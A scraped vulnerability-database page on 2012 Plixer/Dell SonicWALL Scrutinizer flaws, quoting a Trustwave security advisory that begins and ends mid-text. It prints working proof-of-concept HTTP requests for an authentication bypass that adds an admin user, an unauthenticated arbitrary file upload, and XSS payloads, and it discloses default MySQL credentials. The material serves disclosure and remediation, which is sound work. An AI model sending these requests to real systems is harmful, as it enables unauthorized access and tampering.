GET /d4d/exporters.php?aalert(123)=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive
Response 1
/d4d/exporters.php?aalert(123)=1
Request 2
GET /d4d/exporters.php HTTP/1.1 Host: A.B.C.D Accept: / Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://D.E.F.G/search?hl=en&q=aalert(123)=1 Content-Length: 2
Response 2
http://D.E.F.G/search?hl=en&q=aalert(123)=1
Finding 4: Undocumented Default Admin MySQL Users CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP installation which is installed as part of the scrutinizer installer package. The installation of these packages are transparent to the user during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which are not configured by the user which could be easily guessed by an attacker. There is currently no way to change these values within the Scrutinizer application and changing them manually in the MySQL instance has unknown effects on the application due to hardcoded values for some of these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative passwords:
Request
select User,Password from mysql.user;
Response
User |Password root | root | scrutinizer |4ACFE3202A5FF5CF467898FC58AAB1D615029441 scrutremote |4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote' users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update, delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the equivalent of every network interface on the system allowing users with the proper access rights to interact directly with the MySQL instance.
Remediation Steps: Customers should update to the latest version of Scrutinizer NetFlow & sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been corrected in version 9.5.0.
Revision History: 05/02/12 - Vulnerability disclosed 05/16/12 - Patch released by vendor 07/11/12 - Vendor publishes announcement 07/27/12 - Advisory published
References 1. http://www.plixer.com 2. http://blog.spiderlabs.com
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201207-0529",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "scrutinizer",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "9.5.0"
},
{
"model": "sonicwall scrutinizer",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "9.5.0"
},
{
"model": "sonicwall scrutinizer with flow analytics module",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "9.5.0"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "9.0.0"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "9.0.1"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "8.6.2"
},
{
"model": "international scrutinizer",
"scope": "eq",
"trust": 0.3,
"vendor": "plixer",
"version": "9.0.1.19899"
}
],
"sources": [
{
"db": "BID",
"id": "54726"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003434"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-593"
},
{
"db": "NVD",
"id": "CVE-2012-2627"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:dell:sonicwall_scrutinizer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:dell:sonicwall_scrutinizer_with_flow_analytics_module",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003434"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mario Ceballos of the Metasploit Project and Jonathan Claudius of Trustwave Spiderlabs",
"sources": [
{
"db": "BID",
"id": "54726"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-593"
}
],
"trust": 0.9
},
"cve": "CVE-2012-2627",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2012-2627",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-55908",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2012-2627",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2012-2627",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201207-593",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-55908",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-55908"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003434"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-593"
},
{
"db": "NVD",
"id": "CVE-2012-2627"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\\Scrutinizer\\snmp\\mibs\\ via a multipart/form-data POST request. Scrutinizer is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. \nAn attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. \nScrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014:\nMultiple Vulnerabilities in Scrutinizer NetFlow \u0026 sFlow Analyzer\n\nPublished: 07/27/12\nVersion: 1.0\n\nVendor: Plixer International (http://www.plixer.com)\nProduct: Scrutinizer NetFlow and sFlow Analyzer\nVersion affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions\nmay be affected as well. Please note that the software can be found in a\nlong list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html\nfor the partial list. \n\nProduct description:\nNetwork analysis tool for monitoring the overall network health and reports\non which hosts, applications, protocols, etc. that are consuming network\nbandwidth. \n\nCredits:\nMario Ceballos of the Metasploit Project\nJonathan Claudius of Trustwave Spiderlabs\n\nFinding 1: HTTP Authentication Bypass Vulnerability\nCVE: CVE-2012-2626\n\nThe Scrutinizer web console provides a form-based login facility, requiring\nusers to authenticate to gain access to further functionality. A tiered\nuser access model is also used, where administrative and standard users\nhave a different selection of permissible functions. Authentication and\nauthorization is controlled by the cookie-based session management system. \nAlthough this is implemented in a standardized way, the session tokens are\nnot required to perform privileged functions, such as adding users. \n\nExample(s):\n\nThis request will add a user named \"trustwave\" with the password of\n\"trustwave\" to the administrative user group. \n\n#Request\nPOST /cgi-bin/admin.cgi HTTP/1.1\nHost: A.B.C.D\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nContent-Length: 70\n\ntool=userprefs\u0026newUser=trustwave\u0026pwd=trustwave\u0026selectedUserGroup=1\n\n#Response\nHTTP/1.1 200 OK\nDate: Wed, 25 Apr 2012 17:52:15 GMT\nServer: Apache\nVary: Accept-Encoding\nContent-Length: 19\nContent-Type: text/html; charset=utf-8\n\n{\"new_user_id\":\"2\"}\n\n\nFinding 2: Arbitrary File Upload Vulnerability\nCVE: CVE-2012-2627\n\nThe Scrutinizer web console is prone to unauthenticated arbitrary file upload\nvulnerability. \n\nExample(s):\n\nThis request will upload a test file to the following location:\n\n\u0027C:\\Program Files (x86)\\Scrutinizer\\snmp\\mibs\\trustwave.txt\u0027\n\nNote: This affected folder also contains SNMP configuration files which could\nbe overwritten if an attacker were to select the right file name. \n\n#Request\nPOST /d4d/uploader.php HTTP/1.0\nHost: A.B.C.D\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nContent-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593\nContent-Length: 210\n\n\n--_Part_949_3365333252_3066945593\nContent-Disposition: form-data;\nname=\"uploadedfile\"; filename=\"trustwave.txt\"\nContent-Type: application/octet-stream\n\ntrustwave\n\n--_Part_949_3365333252_3066945593--\n\n#Response\nHTTP/1.1 200 OK\nDate: Wed, 25 Apr 2012 17:39:15 GMT\nServer: Apache\nX-Powered-By: PHP/5.3.3\nVary: Accept-Encoding\nContent-Length: 41\nConnection: close\nContent-Type: text/html\n\n{\"success\":1,\"file_name\":\"trustwave.txt\"}\n\n#Confirming on File System\nC:\\\u003etype \"Program Files (x86)\\Scrutinizer\\snmp\\mibs\\trustwave.txt\"\ntrustwave\n\n\nFinding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php\nCVE: CVE-2012-3848\n\nThe Scrutinizer web console suffers from multiple Cross Site Scripting\nvulnerabilities in the following pages:\n\n1.) /d4d/contextMenu.php\n2.) /d4d/exporters.php\n\nThese vulnerabilities include the following:\n\n1.) XSS via arbitrary parameter\n3.) XSS via referrer header\n\nExample(s):\n\nThe following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php\n\n#Request 1\nGET /d4d/exporters.php?a\u003cscript\u003ealert(123)\u003c/script\u003e=1 HTTP/1.1\nHost: A.B.C.D\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\n\n#Response 1\n\u003csnip\u003e\n\u003ca href=\"/d4d/exporters.php?a\u003cscript\u003ealert(1)\u003c/script\u003e=1\"\u003e/d4d/exporters.php?a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\n\u003csnip\u003e\n\n#Request 2\nGET /d4d/exporters.php HTTP/1.1\nHost: A.B.C.D\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\nConnection: close\nReferer: http://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\nContent-Length: 2\n\n#Response 2\n\u003csnip\u003e\n\u003ca href=\"http://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\"\u003ehttp://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e\n\u003csnip\u003e\n\nFinding 4: Undocumented Default Admin MySQL Users\nCVE: CVE-2012-3951\n\nThe Scrutinizer application relies on an underlying Apache, MySQL and PHP\ninstallation which is installed as part of the scrutinizer installer\npackage. The installation of these packages are transparent to the user\nduring the Scrutinizer installation. \n\nThe installation selects default passwords for internal MySQL Users which\nare not configured by the user which could be easily guessed by an\nattacker. There is currently no way to change these values within the\nScrutinizer application and changing them manually in the MySQL instance\nhas unknown effects on the application due to hardcoded values for some of\nthese accounts. \n\nExample(s):\n\nThe following MySQL command can be run to see the users and their relative\npasswords:\n\n#Request\nselect User,Password from mysql.user;\n\n#Response\nUser |Password\nroot |\nroot |\nscrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441\nscrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441\n\nNote 1: the above hash shared between the \u0027scrutinizer\u0027 and \u0027scrutremote\u0027\nusers is equivalent to \u0027admin\u0027\n\nNote 2: the \u0027scrutinizer\u0027 and \u0027scrutremote\u0027 users have select, update,\ndelete, create, drop, and more permissions within the MySQL instance. \n\nNote 3: By default, the MySQL instance is bound to \"0.0.0.0\", the\nequivalent of every network interface on the system allowing users with the\nproper access rights to interact directly with the MySQL instance. \n\n\nRemediation Steps:\nCustomers should update to the latest version of Scrutinizer NetFlow \u0026\nsFlow Analyzer in order to address findings 1, 2 and 3. These issues have been\ncorrected in version 9.5.0. \n\nRevision History:\n05/02/12 - Vulnerability disclosed\n05/16/12 - Patch released by vendor\n07/11/12 - Vendor publishes announcement\n07/27/12 - Advisory published\n\nReferences\n1. http://www.plixer.com\n2. http://blog.spiderlabs.com\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2627"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003434"
},
{
"db": "BID",
"id": "54726"
},
{
"db": "VULHUB",
"id": "VHN-55908"
},
{
"db": "PACKETSTORM",
"id": "115091"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-55908",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-55908"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-2627",
"trust": 2.9
},
{
"db": "BID",
"id": "54726",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003434",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201207-593",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "37548",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-55908",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "115091",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-55908"
},
{
"db": "BID",
"id": "54726"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003434"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-593"
},
{
"db": "NVD",
"id": "CVE-2012-2627"
}
]
},
"id": "VAR-201207-0529",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-55908"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:35:27.881000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Dell SonicWALL Scrutinizer",
"trust": 0.8,
"url": "http://www.dell.com/us/business/p/sonicwall-scrutinizer/pd"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003434"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003434"
},
{
"db": "NVD",
"id": "CVE-2012-2627"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.plixer.com/press-releases/plixer-releases-9-5-2.html"
},
{
"trust": 2.5,
"url": "https://www.trustwave.com/spiderlabs/advisories/twsl2012-014.txt"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2627"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-2627"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/54726"
},
{
"trust": 0.4,
"url": "http://www.plixer.com"
},
{
"trust": 0.1,
"url": "http://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\"\u003ehttp://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e"
},
{
"trust": 0.1,
"url": "http://blog.spiderlabs.com"
},
{
"trust": 0.1,
"url": "http://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "http://www.plixer.com/scrutinizer-netflow-sflow/scrutinizer.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3951"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2626"
},
{
"trust": 0.1,
"url": "http://www.plixer.com)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3848"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2627"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-55908"
},
{
"db": "BID",
"id": "54726"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003434"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-593"
},
{
"db": "NVD",
"id": "CVE-2012-2627"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-55908"
},
{
"db": "BID",
"id": "54726"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003434"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-593"
},
{
"db": "NVD",
"id": "CVE-2012-2627"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-31T00:00:00",
"db": "VULHUB",
"id": "VHN-55908"
},
{
"date": "2012-07-30T00:00:00",
"db": "BID",
"id": "54726"
},
{
"date": "2012-08-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003434"
},
{
"date": "2012-07-29T23:22:22",
"db": "PACKETSTORM",
"id": "115091"
},
{
"date": "2012-07-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201207-593"
},
{
"date": "2012-07-31T10:45:41.450000",
"db": "NVD",
"id": "CVE-2012-2627"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-12T00:00:00",
"db": "VULHUB",
"id": "VHN-55908"
},
{
"date": "2012-07-30T00:00:00",
"db": "BID",
"id": "54726"
},
{
"date": "2012-08-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003434"
},
{
"date": "2012-08-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201207-593"
},
{
"date": "2024-11-21T01:39:19.200000",
"db": "NVD",
"id": "CVE-2012-2627"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-593"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerable to creating or overwriting arbitrary files",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003434"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201207-593"
}
],
"trust": 0.6
}
}
var-201207-0300
Vulnerability from variot
Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php. (1) d4d/exporters.php Query string for (2) d4d/exporters.php To HTTP Referer header (3) d4d/contextMenu.php Unspecified input to. Scrutinizer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12 Version: 1.0
Vendor: Plixer International (http://www.plixer.com) Product: Scrutinizer NetFlow and sFlow Analyzer Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions may be affected as well. Please note that the software can be found in a long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html for the partial list.
Product description: Network analysis tool for monitoring the overall network health and reports on which hosts, applications, protocols, etc. that are consuming network bandwidth.
Credits: Mario Ceballos of the Metasploit Project Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring users to authenticate to gain access to further functionality. A tiered user access model is also used, where administrative and standard users have a different selection of permissible functions. Authentication and authorization is controlled by the cookie-based session management system. Although this is implemented in a standardized way, the session tokens are not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of "trustwave" to the administrative user group.
Request
